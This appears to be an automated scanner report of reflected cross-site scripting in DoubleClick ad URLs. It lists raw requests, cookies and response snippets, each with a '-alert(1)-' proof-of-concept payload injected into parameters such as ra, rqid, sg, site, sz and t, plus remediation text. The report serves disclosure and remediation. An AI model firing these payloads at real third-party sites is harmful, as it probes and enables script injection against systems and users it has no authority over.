GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=240430d94"-alert(1)-"9c506468d33&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=240430d94"-alert(1)-"9c506468d33&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/ ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9e50'-alert(1)-'004cb74b4bc was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b9e50'-alert(1)-'004cb74b4bc&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 03940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b9e50'-alert(1)-'004cb74b4bc&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334\" ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15cbc"-alert(1)-"608d4e19f74 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24315cbc"-alert(1)-"608d4e19f74&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 03940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24315cbc"-alert(1)-"608d4e19f74&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334") ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f433'-alert(1)-'597cd362001 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF349f433'-alert(1)-'597cd362001&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF349f433'-alert(1)-'597cd362001&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpi ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d50"-alert(1)-"f3f94351ac2 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34f8d50"-alert(1)-"f3f94351ac2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34f8d50"-alert(1)-"f3f94351ac2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpi ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba5fc'-alert(1)-'19c8d83429c was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940ba5fc'-alert(1)-'19c8d83429c&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... " href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940ba5fc'-alert(1)-'19c8d83429c&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5 ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b8e"-alert(1)-"6acf202cf9 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940a5b8e"-alert(1)-"6acf202cf9&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940a5b8e"-alert(1)-"6acf202cf9&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5 ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4b8'-alert(1)-'0aa56bdd7f2 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236e4b8'-alert(1)-'0aa56bdd7f2&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... v8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236e4b8'-alert(1)-'0aa56bdd7f2&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&e ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a54c"-alert(1)-"c7a2c8d08c4 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236a54c"-alert(1)-"c7a2c8d08c4&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... v8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236a54c"-alert(1)-"c7a2c8d08c4&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&e ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26763"-alert(1)-"49e8dd20203 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=1862626763"-alert(1)-"49e8dd20203&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=1862626763"-alert(1)-"49e8dd20203&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 368d1'-alert(1)-'6067eb13c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626368d1'-alert(1)-'6067eb13c0&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... =\"_blank\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626368d1'-alert(1)-'6067eb13c0&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21 ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31927'-alert(1)-'3a122baa891 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.3931927'-alert(1)-'3a122baa891&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.3931927'-alert(1)-'3a122baa891&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435\"> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec72f"-alert(1)-"ab1b11816da was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
